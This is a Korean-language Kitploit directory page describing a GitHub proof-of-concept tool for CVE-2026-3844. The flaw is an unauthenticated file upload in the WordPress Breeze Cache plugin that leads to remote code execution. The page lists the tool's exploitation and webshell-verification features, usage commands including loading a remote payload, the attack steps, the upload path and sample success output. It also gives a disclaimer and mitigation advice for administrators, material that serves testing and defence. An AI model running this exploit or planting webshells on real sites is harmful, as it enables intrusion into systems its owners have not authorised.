Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-3844 — # CVE-2026-3844에 대한 Python 개념 증명 코드 WordPress Breeze Cache 플러그인의 인증되지 않은 임의 파일 업로드 취약점으로, 원격 코드 실행을 가능하게 합니다. 탐지, 악용, 웹셸 검증 기능을 포함합니다. | Kitploit
도구/GitHubGitHub/sahmsec/cve-2026-3844
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubsahmsec/cve-2026-3844

CVE-2026-3844

# CVE-2026-3844에 대한 Python 개념 증명 코드 WordPress Breeze Cache 플러그인의 인증되지 않은 임의 파일 업로드 취약점으로, 원격 코드 실행을 가능하게 합니다. 탐지, 악용, 웹셸 검증 기능을 포함합니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-3844 — WordPress Breeze Cache 인증되지 않은 파일 업로드

개요

이 저장소는 WordPress Breeze Cache 플러그인 <= 2.4.4에 영향을 미치는 인증되지 않은 임의 파일 업로드(Unauthenticated Arbitrary File Upload) 취약점을 시연하기 위한 Python 개념 증명(PoC) 스크립트를 포함합니다.

⚠️ 이 프로젝트는 승인된 보안 테스트, 교육적 연구, 방어적 검증 목적으로만 엄격히 사용됩니다.


취약점 정보

  • CVE ID: CVE-2026-3844
  • 영향을 받는 플러그인: WordPress용 Breeze Cache
  • 영향을 받는 버전: <= 2.4.4
  • 이슈 유형: 인증되지 않은 임의 파일 업로드
  • 영향: 잠재적 원격 코드 실행(RCE)
  • 공격 벡터: 원격 / 인증되지 않음

이 취약점은 Breeze Cache의 gravatar 캐싱 기능을 악용하여 공격자가 제어하는 파일을 WordPress 캐시 디렉터리에 저장합니다.


기능

  • 취약점 탐지 모드
  • 자동화된 악용 워크플로우
  • 웹쉘 검증 지원
  • 색상이 적용된 터미널 출력
  • 원격 페이로드 로딩
  • 업로드 검증 확인
  • 선택적 출력 로깅

요구 사항

  • Python 3.8+
  • pycurl
  • termcolor
  • 의존성 설치:

    root@kitploit:~
    pip install pycurl termcolor
    

    파일

    파일설명
    CVE-2026-3844.py메인 PoC 악용 스크립트
    CVE-2026-3844.yamlYAML 템플릿/구성

    사용법

    대상이 취약한지 확인

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com --check-only
    

    악용 실행

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com
    

    사용자 정의 페이로드

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
    

    결과 저장

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com -o results.txt
    

    작동 방식

    스크립트는 다음 단계를 수행합니다:

    1. 설치된 Breeze Cache 버전 탐지
    2. 플러그인 버전이 취약한지 확인
    3. 조작된 WordPress 댓글 요청 제출
    4. Breeze 캐시 gravatar 처리 악용
    5. 캐시 생성 대기
    6. 업로드된 파일에 접근 가능한지 검증
    7. 페이로드 응답성 테스트

    취약 경로

    업로드된 페이로드는 다음 경로에서 접근 가능할 수 있습니다:

    root@kitploit:~
    /wp-content/cache/breeze-extra/gravatars/
    

    참고 사항

    성공적인 악용은 다음 Breeze 설정이 활성화되어 있어야 할 수 있습니다:

    root@kitploit:~
    Host Files Locally - Gravatars
    

    이 기능이 비활성화된 경우 악용 시도가 실패할 수 있습니다.


    출력 예시

    root@kitploit:~
    [+] Target VULNERABLE (Breeze v2.4.4)
    [+] Comment posted successfully
    [+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
    [+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
    

    면책 조항

    이 저장소는 다음을 위해 제공됩니다:

    • 보안 연구
    • 교육 목적
    • 승인된 침투 테스트
    • 방어적 보안 평가

    소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 이 프로젝트를 사용하지 마십시오.

    저자는 이 프로젝트로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.


    완화 권장 사항

    웹사이트 관리자는 다음을 수행해야 합니다:

    • Breeze Cache를 최신 패치 버전으로 업데이트
    • 불필요한 파일 캐싱 기능 비활성화
    • 위험한 파일 업로드 제한
    • 캐시 디렉터리 내 PHP 실행 비활성화
    • /wp-content/cache/에서 의심스러운 파일 모니터링
    • 웹 애플리케이션 방화벽(WAF) 배포
    • 엄격한 서버 측 검증 시행

    교육적 목적 설명

    이 개념 증명은 다음을 돕기 위해 제작되었습니다:

    • 보안 연구원
    • 침투 테스터
    • 블루 팀
    • WordPress 관리자
    • 개발자

    안전하지 않은 캐싱 메커니즘과 임의 파일 업로드와 관련된 보안 위험을 이해하도록 돕기 위함입니다.


    참고 자료

    • CVE 데이터베이스
    • WordPress 보안 권고
    • OWASP 파일 업로드 보안 가이드라인
    • Breeze Cache 플러그인 문서

    작성자

    보안 연구 / 교육 프로젝트

    도구 다운로드